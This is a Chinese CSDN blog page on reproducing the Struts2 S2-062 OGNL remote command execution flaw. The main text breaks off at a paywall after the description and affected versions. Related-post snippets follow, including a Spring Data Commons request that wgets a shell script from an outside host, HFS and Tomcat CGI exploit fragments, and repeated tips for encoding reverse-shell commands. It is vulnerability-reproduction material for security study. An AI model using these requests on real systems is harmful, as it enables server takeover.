S2-062 远程命令执行漏洞复现(cve-2021-31805)

已于 2022-06-27 20:33:14 修改
阅读量7.7k 收藏 8
点赞数
分类专栏: 漏洞复现 渗透测试 文章标签: 安全 网络安全
于 2022-04-19 17:47:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44110340/article/details/124279481
版权
本文详细介绍了Struts2 S2-062远程命令执行漏洞(CVE-2021-31805),该漏洞源于对CVE-2020-17530修复的不完全,影响Struts2的多个版本。攻击者可以通过base64和URL编码的反弹命令进行OGNL表达式执行,实现远程代码执行。提供了一个复现漏洞的在线靶场,并给出修复建议,包括升级到安全版本和避免使用不受信任的用户输入进行OGNL评估。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

S2-062 远程命令执行(cve-2021-31805)

## 麻烦各位师傅看仔细一点 反弹命令->base64编码->URL编码 (burp 选中Ctrl+U)
## 麻烦各位师傅看仔细一点 反弹命令->base64编码->URL编码 (burp 选中Ctrl+U)
## 麻烦各位师傅看仔细一点 反弹命令->base64编码->URL编码 (burp 选中Ctrl+U)
## 麻烦各位师傅看仔细一点 反弹命令->base64编码->URL编码 (burp 选中Ctrl+U)
## 麻烦各位师傅看仔细一点 反弹命令->base64编码->URL编码 (burp 选中Ctrl+U)

0x00 漏洞描述

该漏洞由于对CVE-2020-17530的修复不完整造成的,CVE-2020-17530漏洞是由于Struts2 会对某些标签属性(比如id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 其中x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。在CVE-2021-31805漏洞中,仍然存在部分标签属性会造成攻击者恶意构造的OGNL表达式执行,导致远程代码执行。

0x01 影响版本

Struts 2.0.0 - Struts 2.5.29</

最低0.47元/天 解锁文章
漏洞复现】Struts2 S2-046 远程命令执行漏洞CVE-2017-5638)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-14 1076
CVE-2017-5638 即st2-045/st2-046漏洞,影响范围Struts 2.3.5-2.3.31,Struts 2.5-2.5.10Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。...
漏洞复现】Struts2 S2-048 远程命令执行漏洞CVE-2017-9791)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-11 580
描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。......
HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 6036
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
Struts2 S2-062远程代码执行漏洞(CVE-2021-31805)复现
PolarPeak的博客
06-06 1500
远程代码执行S2-062CVE-2021-31805)由于Apache Struts2对S2-061(CVE-2020-17530)的修复不够完整,导致一些标签属性仍然可以执行 OGNL 表达式,攻击者利用该漏洞可以构造恶意数据远程执行任意代码。高危。受影响的版本:Struts 2.0.0 - Struts 2.5.29安全版本:Struts >= 2.5.30漏洞环境复用vulhub/struts2/s2-061/的docker环境,使用版本是struts2.5.25链接:vulhub/struts2/
Vulhub Supervisord 远程命令执行漏洞复现
weixin_53696027的博客
06-07 424
Vulhub Supervisord 远程命令执行漏洞复现
vulhub-CVE-2018-1273远程命令执行漏洞复现
m0_62008601的博客
09-23 1429
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听,这时候用nc进行监听的话,收不到反弹的shell。发送命令之后返回500说明执行成功,接着我们登录到doker容器看到success文件成功被创建,说明漏洞存在。执行之后如果没成功反弹shell ,可以先执行赋予文件权限的命令。开启监听之后,再修改请求命令,让靶机执行木马文件上线。
Struts2 S2-061 远程命令执行漏洞CVE-2020-17530)漏洞复现
sechelper的博客
01-11 877
cve漏洞详细复现漏洞利用,反弹shell,工具分享
漏洞复现】Struts2 S2-062 (CVE-2021-31805) 远程代码执行漏洞
李火火的安全圈
04-15 3675
文章目录声明前言一、漏洞描述二、漏洞原理三、影响版本四、安全版本五、漏洞细节分析六、本地复现七、漏洞修复 声明 本篇文章仅用于技术研究和漏洞复现,切勿从事非法渗透,造成任何影响与本作者无关,切记! 前言 Apache 官方发布了 Apache Struts2 的风险通告,漏洞编号为 CVE-2021-31805,可能会导致远程代码执行。 一、漏洞描述 此次 Apache Struts2 漏洞CVE-2020-17530 ( S2-061 )的修复不完整,导致输入验证不正确。 如果开发人员使用%{…}
CVE-2017-8464远程命令执行漏洞复现
u011215939的博客
12-20 1102
CVE-2017-8464远程命令执行漏洞复现 前言 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到漏洞效果,请勿非法使用,仅供学习研究
Typora-远程命令执行漏洞复现-CVE-2023-2317
apple_52661176的博客
08-31 440
Typora 是一款支持实时预览的 Markdown 文本编辑器。Windows和Linux版本存在一个安全漏洞,具体表现为在updater/update.html中存在DOM-based XSS漏洞。这个漏洞的危害是允许攻击者通过加载精心制作的markdown文件,来执行恶意的JavaScript代码。如果用户在Typora中打开了这个恶意markdown文件,或者从一个恶意网页复制文本并将其粘贴到Typora中,那么攻击者可以通过在<embed>标签中引用update.html来利用这个漏洞
Webmin远程命令执行漏洞复现
最新发布
yuan_boss的博客
10-12 979
详细的来说,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。payload中的IP改为目标网站的IP,注意user=rootxx这部分,如果写的是user=root,肯定不能成功注入,必须是目标网站的服务器中不存在的用户,否则就会命令执行失败。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
CVE-2021-32849 Gerapy远程命令执行漏洞复现
include_voidmain的博客
03-09 1313
CVE-2021-32849 Gerapy远程命令执行漏洞复现
Drupal远程命令执行漏洞复现
BerL1n
12-29 942
time: 2019-05-12 21:46 漏洞描述 Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。 漏洞检测 针对该漏洞,可采用两种方法进行检测: 方法一:登陆Drupal管理后台,查看内核版本是8.x,且版本号低于8.3.4,则存在该漏洞;否则,不存在该漏洞; 方法二:在Drupal根目录下找到文件/core/lib/Drupal/Com
Spring Data Commons远程命令执行漏洞复现CVE-2018-1273)
wutiangui的博客
09-10 1050
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
CVE-2019-15107 Webmin远程命令执行漏洞复现
EC_Carrot的博客
03-03 316
漏洞概括 Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。 影响版本: Webmin <= 1.920 环境搭建 自己用docker搭了个1.910版本的Webmin,具体操作… 漏洞的触发需要开启密码重置功能,需要把允许用户使用旧密码设置新密码的选项给选上。 登录
PHP imap 远程命令执行漏洞复现CVE-2018-19518)
ch258563的博客
05-30 526
PHP imap 远程命令执行漏洞复现CVE-2018-19518)
网康 NS-ASG安全网关存在远程命令执行漏洞 复现
薛定谔嘚喵博客
10-09 628
网康应用安全网关系统 存在远程命令执行漏洞 ,攻击者通过漏洞可以执行任意命令,导致服务器失陷。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值